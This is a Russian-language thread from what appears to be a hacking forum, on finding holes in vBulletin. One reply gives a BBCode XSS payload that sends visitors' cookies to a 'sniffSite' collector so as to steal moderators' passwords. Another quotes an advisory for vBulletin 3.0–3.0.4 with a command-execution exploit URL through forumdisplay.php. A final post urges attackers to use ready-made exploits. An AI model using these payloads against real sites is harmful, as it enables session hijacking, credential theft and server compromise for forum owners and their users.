• XSS.stack #1 – первый литературный журнал от юзеров форума

Хочу найти дыру в Vbulletin

А ты как думал???...
Конечно есть(смотря для какой версии)
Вот тебе для 3.х(и всех остальных:) ):
mailto:assss@wew.ew ]
sssssss[/URL]
` style=`background:url(javaSCript:document.images[68].src="htt"+"p"+":"+"/"+"/"+"sniffSite/sniff.cgi?"+document.cookie)`
Вот так можно подснифать пассы модеров.
 
На античате Запрос хреновый. Незнающий человек не разберется.
 
Вот появилась уязвимость:

Выполнение произвольных команд в vBulletin
Программа: vBulletin 3.0 - 3.0.4

Опасность: Высокая

Наличие эксплоита
: Да

Описание:
Уязвимость в vBulletin позволяет удаленному пользователю выполнить произвольные команды на уязвимой системе.

Уязвимость существует в сценарии forumdisplay.php из-за некорректной обработки глобальных переменных. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные команды на системе.

Пример/Эксплоит:

http://site/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('id')."

URL производителя: http://www.vbulletin.com

Решение: Установите последнюю версию с сайта производителя.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
искать только эксплоиты, только они.
ставить на хост, версию, которая интересна для хека, для ручного анализа уйдет много времени, сил, ума, и есть факт, что 90% вы ничего не найдете.
Сканеры не помогут на таком проекте, так же я уже говорил, и подчеркну еще раз, что любая cms, блог, форум, искать баги на sql xss rfi lfi бесполезно.
Полезно, заюзать сплоит, под ту или иную версию булки. Все придумано за нас.
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх